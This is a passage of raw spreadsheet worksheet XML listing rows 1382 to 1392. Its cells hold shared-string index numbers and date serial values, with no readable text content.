        <v>10796</v>
      </c>
      <c r="G1382" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1382" s="23"/>
      <c r="I1382" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1382" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1382" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1382" s="24">
        <v>46000.3612384259</v>
      </c>
      <c r="M1382" s="24">
        <v>46000.3612384259</v>
      </c>
      <c r="N1382" s="23" t="s">
        <v>8710</v>
      </c>
      <c r="O1382" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1382" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1382" s="23"/>
      <c r="R1382" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S1382" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1382" s="23"/>
      <c r="U1382" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1382" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1382" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1382" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1382" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1382" s="24">
        <v>46000.3615277778</v>
      </c>
      <c r="AA1382" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1382" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1382" s="23"/>
      <c r="AD1382" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1382" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1382" s="23"/>
      <c r="AG1382" s="25" t="s">
        <v>8409</v>
      </c>
      <c r="AH1382" s="24">
        <v>46000.3615509259</v>
      </c>
      <c r="AI1382" s="23"/>
      <c r="AJ1382" s="23"/>
      <c r="AK1382" s="23"/>
      <c r="AL1382" s="23"/>
      <c r="AM1382" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1382" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1382" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1382" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1382" s="24">
        <v>46000.3823611111</v>
      </c>
      <c r="AR1382" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1382" s="23"/>
      <c r="AT1382" s="23"/>
      <c r="AU1382" s="23"/>
    </row>
    <row r="1383" s="1" customFormat="1" spans="1:47">
      <c r="A1383" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1383" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1383" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1383" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1383" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1383" s="23" t="s">
        <v>10797</v>
      </c>
      <c r="G1383" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1383" s="23"/>
      <c r="I1383" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1383" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1383" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1383" s="24">
        <v>45999.7897222222</v>
      </c>
      <c r="M1383" s="24">
        <v>45999.7897222222</v>
      </c>
      <c r="N1383" s="23" t="s">
        <v>8385</v>
      </c>
      <c r="O1383" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1383" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1383" s="23"/>
      <c r="R1383" s="23" t="s">
        <v>10785</v>
      </c>
      <c r="S1383" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1383" s="23"/>
      <c r="U1383" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1383" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1383" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1383" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1383" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1383" s="24">
        <v>45999.7905671296</v>
      </c>
      <c r="AA1383" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1383" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1383" s="23"/>
      <c r="AD1383" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1383" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1383" s="23"/>
      <c r="AG1383" s="25" t="s">
        <v>8425</v>
      </c>
      <c r="AH1383" s="24">
        <v>45999.7906134259</v>
      </c>
      <c r="AI1383" s="23"/>
      <c r="AJ1383" s="23"/>
      <c r="AK1383" s="23"/>
      <c r="AL1383" s="23"/>
      <c r="AM1383" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1383" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1383" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1383" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1383" s="24">
        <v>45999.811400463</v>
      </c>
      <c r="AR1383" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1383" s="23"/>
      <c r="AT1383" s="23"/>
      <c r="AU1383" s="23"/>
    </row>
    <row r="1384" s="1" customFormat="1" spans="1:47">
      <c r="A1384" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1384" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1384" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1384" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1384" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1384" s="23" t="s">
        <v>10798</v>
      </c>
      <c r="G1384" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1384" s="23"/>
      <c r="I1384" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1384" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1384" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1384" s="24">
        <v>45999.6889467593</v>
      </c>
      <c r="M1384" s="24">
        <v>45999.6889467593</v>
      </c>
      <c r="N1384" s="23" t="s">
        <v>9116</v>
      </c>
      <c r="O1384" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1384" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1384" s="23"/>
      <c r="R1384" s="23" t="s">
        <v>2484</v>
      </c>
      <c r="S1384" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1384" s="23"/>
      <c r="U1384" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1384" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1384" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1384" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1384" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1384" s="24">
        <v>45999.6899305556</v>
      </c>
      <c r="AA1384" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1384" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1384" s="23"/>
      <c r="AD1384" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1384" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1384" s="23"/>
      <c r="AG1384" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1384" s="24">
        <v>45999.6899537037</v>
      </c>
      <c r="AI1384" s="23"/>
      <c r="AJ1384" s="23"/>
      <c r="AK1384" s="23"/>
      <c r="AL1384" s="23"/>
      <c r="AM1384" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1384" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1384" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1384" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1384" s="24">
        <v>45999.7107638889</v>
      </c>
      <c r="AR1384" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1384" s="23"/>
      <c r="AT1384" s="23"/>
      <c r="AU1384" s="23"/>
    </row>
    <row r="1385" s="1" customFormat="1" spans="1:47">
      <c r="A1385" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1385" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1385" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1385" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1385" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1385" s="23" t="s">
        <v>10799</v>
      </c>
      <c r="G1385" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1385" s="23"/>
      <c r="I1385" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1385" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1385" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1385" s="24">
        <v>45999.6690277778</v>
      </c>
      <c r="M1385" s="24">
        <v>45999.6690277778</v>
      </c>
      <c r="N1385" s="23" t="s">
        <v>8666</v>
      </c>
      <c r="O1385" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1385" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1385" s="23"/>
      <c r="R1385" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S1385" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1385" s="23"/>
      <c r="U1385" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1385" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1385" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1385" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1385" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1385" s="24">
        <v>45999.6698263889</v>
      </c>
      <c r="AA1385" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1385" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1385" s="23"/>
      <c r="AD1385" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1385" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1385" s="23"/>
      <c r="AG1385" s="25" t="s">
        <v>8409</v>
      </c>
      <c r="AH1385" s="24">
        <v>45999.669849537</v>
      </c>
      <c r="AI1385" s="23"/>
      <c r="AJ1385" s="23"/>
      <c r="AK1385" s="23"/>
      <c r="AL1385" s="23"/>
      <c r="AM1385" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1385" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1385" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1385" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1385" s="24">
        <v>45999.6906597222</v>
      </c>
      <c r="AR1385" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1385" s="23"/>
      <c r="AT1385" s="23"/>
      <c r="AU1385" s="23"/>
    </row>
    <row r="1386" s="1" customFormat="1" spans="1:47">
      <c r="A1386" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1386" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1386" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1386" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1386" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1386" s="23" t="s">
        <v>10800</v>
      </c>
      <c r="G1386" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1386" s="23"/>
      <c r="I1386" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1386" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1386" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1386" s="24">
        <v>45999.6624652778</v>
      </c>
      <c r="M1386" s="24">
        <v>45999.6624652778</v>
      </c>
      <c r="N1386" s="23" t="s">
        <v>8424</v>
      </c>
      <c r="O1386" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1386" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1386" s="23"/>
      <c r="R1386" s="23" t="s">
        <v>2484</v>
      </c>
      <c r="S1386" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1386" s="23"/>
      <c r="U1386" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1386" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1386" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1386" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1386" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1386" s="24">
        <v>45999.6634143519</v>
      </c>
      <c r="AA1386" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1386" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1386" s="23"/>
      <c r="AD1386" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1386" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1386" s="23"/>
      <c r="AG1386" s="25" t="s">
        <v>8409</v>
      </c>
      <c r="AH1386" s="24">
        <v>45999.6634375</v>
      </c>
      <c r="AI1386" s="23"/>
      <c r="AJ1386" s="23"/>
      <c r="AK1386" s="23"/>
      <c r="AL1386" s="23"/>
      <c r="AM1386" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1386" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1386" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1386" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1386" s="24">
        <v>45999.6842476852</v>
      </c>
      <c r="AR1386" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1386" s="23"/>
      <c r="AT1386" s="23"/>
      <c r="AU1386" s="23"/>
    </row>
    <row r="1387" s="1" customFormat="1" spans="1:47">
      <c r="A1387" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1387" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1387" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1387" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1387" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1387" s="23" t="s">
        <v>10801</v>
      </c>
      <c r="G1387" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1387" s="23"/>
      <c r="I1387" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1387" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1387" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1387" s="24">
        <v>45999.6223726852</v>
      </c>
      <c r="M1387" s="24">
        <v>45999.6223726852</v>
      </c>
      <c r="N1387" s="23" t="s">
        <v>8582</v>
      </c>
      <c r="O1387" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1387" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1387" s="23"/>
      <c r="R1387" s="23" t="s">
        <v>1018</v>
      </c>
      <c r="S1387" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1387" s="23"/>
      <c r="U1387" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1387" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1387" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1387" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1387" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1387" s="24">
        <v>45999.623287037</v>
      </c>
      <c r="AA1387" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1387" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1387" s="23"/>
      <c r="AD1387" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1387" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1387" s="23"/>
      <c r="AG1387" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1387" s="24">
        <v>45999.6233217593</v>
      </c>
      <c r="AI1387" s="23"/>
      <c r="AJ1387" s="23"/>
      <c r="AK1387" s="23"/>
      <c r="AL1387" s="23"/>
      <c r="AM1387" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1387" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1387" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1387" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1387" s="24">
        <v>45999.6441203704</v>
      </c>
      <c r="AR1387" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1387" s="23"/>
      <c r="AT1387" s="23"/>
      <c r="AU1387" s="23"/>
    </row>
    <row r="1388" s="1" customFormat="1" spans="1:47">
      <c r="A1388" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1388" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1388" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1388" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1388" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1388" s="23" t="s">
        <v>10802</v>
      </c>
      <c r="G1388" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1388" s="23"/>
      <c r="I1388" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1388" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1388" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1388" s="24">
        <v>45999.5833564815</v>
      </c>
      <c r="M1388" s="24">
        <v>45999.5833564815</v>
      </c>
      <c r="N1388" s="23" t="s">
        <v>8582</v>
      </c>
      <c r="O1388" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1388" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1388" s="23"/>
      <c r="R1388" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S1388" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1388" s="23"/>
      <c r="U1388" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1388" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1388" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1388" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1388" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1388" s="24">
        <v>45999.5836805556</v>
      </c>
      <c r="AA1388" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1388" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1388" s="23"/>
      <c r="AD1388" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1388" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1388" s="23"/>
      <c r="AG1388" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1388" s="24">
        <v>45999.5837037037</v>
      </c>
      <c r="AI1388" s="23"/>
      <c r="AJ1388" s="23"/>
      <c r="AK1388" s="23"/>
      <c r="AL1388" s="23"/>
      <c r="AM1388" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1388" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1388" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1388" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1388" s="24">
        <v>45999.6045138889</v>
      </c>
      <c r="AR1388" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1388" s="23"/>
      <c r="AT1388" s="23"/>
      <c r="AU1388" s="23"/>
    </row>
    <row r="1389" s="1" customFormat="1" spans="1:47">
      <c r="A1389" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1389" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1389" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1389" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1389" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1389" s="23" t="s">
        <v>10803</v>
      </c>
      <c r="G1389" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1389" s="23"/>
      <c r="I1389" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1389" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1389" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1389" s="24">
        <v>45999.5702083333</v>
      </c>
      <c r="M1389" s="24">
        <v>45999.5702083333</v>
      </c>
      <c r="N1389" s="23" t="s">
        <v>8385</v>
      </c>
      <c r="O1389" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1389" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1389" s="23"/>
      <c r="R1389" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S1389" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1389" s="23"/>
      <c r="U1389" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1389" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1389" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1389" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1389" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1389" s="24">
        <v>45999.5711342593</v>
      </c>
      <c r="AA1389" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1389" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1389" s="23"/>
      <c r="AD1389" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1389" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1389" s="23"/>
      <c r="AG1389" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1389" s="24">
        <v>45999.5711689815</v>
      </c>
      <c r="AI1389" s="23"/>
      <c r="AJ1389" s="23"/>
      <c r="AK1389" s="23"/>
      <c r="AL1389" s="23"/>
      <c r="AM1389" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1389" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1389" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1389" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1389" s="24">
        <v>45999.5919675926</v>
      </c>
      <c r="AR1389" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1389" s="23"/>
      <c r="AT1389" s="23"/>
      <c r="AU1389" s="23"/>
    </row>
    <row r="1390" s="1" customFormat="1" spans="1:47">
      <c r="A1390" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1390" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1390" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1390" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1390" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1390" s="23" t="s">
        <v>10804</v>
      </c>
      <c r="G1390" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1390" s="23"/>
      <c r="I1390" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1390" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1390" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1390" s="24">
        <v>45999.379849537</v>
      </c>
      <c r="M1390" s="24">
        <v>45999.379849537</v>
      </c>
      <c r="N1390" s="23" t="s">
        <v>8424</v>
      </c>
      <c r="O1390" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1390" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1390" s="23"/>
      <c r="R1390" s="23" t="s">
        <v>2484</v>
      </c>
      <c r="S1390" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1390" s="23"/>
      <c r="U1390" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1390" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1390" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1390" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1390" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1390" s="24">
        <v>45999.3805208333</v>
      </c>
      <c r="AA1390" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1390" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1390" s="23"/>
      <c r="AD1390" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1390" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1390" s="23"/>
      <c r="AG1390" s="25" t="s">
        <v>8450</v>
      </c>
      <c r="AH1390" s="24">
        <v>45999.3806134259</v>
      </c>
      <c r="AI1390" s="23"/>
      <c r="AJ1390" s="23"/>
      <c r="AK1390" s="23"/>
      <c r="AL1390" s="23"/>
      <c r="AM1390" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1390" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1390" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1390" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1390" s="24">
        <v>45999.4013541667</v>
      </c>
      <c r="AR1390" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1390" s="23"/>
      <c r="AT1390" s="23"/>
      <c r="AU1390" s="23"/>
    </row>
    <row r="1391" s="1" customFormat="1" spans="1:47">
      <c r="A1391" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1391" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1391" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1391" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1391" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1391" s="23" t="s">
        <v>10805</v>
      </c>
      <c r="G1391" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1391" s="23"/>
      <c r="I1391" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1391" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1391" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1391" s="24">
        <v>45999.377662037</v>
      </c>
      <c r="M1391" s="24">
        <v>45999.377662037</v>
      </c>
      <c r="N1391" s="23" t="s">
        <v>8424</v>
      </c>
      <c r="O1391" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1391" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1391" s="23"/>
      <c r="R1391" s="23" t="s">
        <v>2484</v>
      </c>
      <c r="S1391" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1391" s="23"/>
      <c r="U1391" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1391" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1391" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1391" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1391" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1391" s="24">
        <v>45999.3784953704</v>
      </c>
      <c r="AA1391" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1391" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1391" s="23"/>
      <c r="AD1391" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1391" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1391" s="23"/>
      <c r="AG1391" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1391" s="24">
        <v>45999.3785300926</v>
      </c>
      <c r="AI1391" s="23"/>
      <c r="AJ1391" s="23"/>
      <c r="AK1391" s="23"/>
      <c r="AL1391" s="23"/>
      <c r="AM1391" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1391" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1391" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1391" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1391" s="24">
        <v>45999.3993287037</v>
      </c>
      <c r="AR1391" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1391" s="23"/>
      <c r="AT1391" s="23"/>
      <c r="AU1391" s="23"/>
    </row>
    <row r="1392" s="1" customFormat="1" spans="1:47">
      <c r="A1392" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1392" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1392" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1392" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1392" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1392" s="23" t="s">
        <v>10806</v>
      </c>
      <c r="G1392" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1392" s="23"/>
      <c r="I1392" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1392" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1392" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1392" s="24">
        <v>45999.3761689815</v>
      </c>
      <c r="M1392" s="24">
        <v>45999.3761689815</v>
      </c>
      <c r="N1392" s="23" t="s">
        <v>8424</v>
      </c>
      <c r="O1392" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1392" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1392" s="23"/>
      <c r="R1392" s="23" t="s">
        <v>2484</v>
      </c>
      <c r="S1392" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1392" s="23"/>
      <c r="U1392" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1392" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1392" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1392" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1392" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1392" s="24">
        <v>45999.3769560185</v>
      </c>
      <c r="AA1392" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1392" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1392" s="23"/>
      <c r="AD1392" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1392" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1392" s="23"/>
      <c r="AG1392" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1392" s="24">
        <v>45999.3769907407</v>
      </c>
      <c r="AI1392" s="23"/>
      <c r="AJ1392" s="23"/>
      <c r="AK1392" s="23"/>
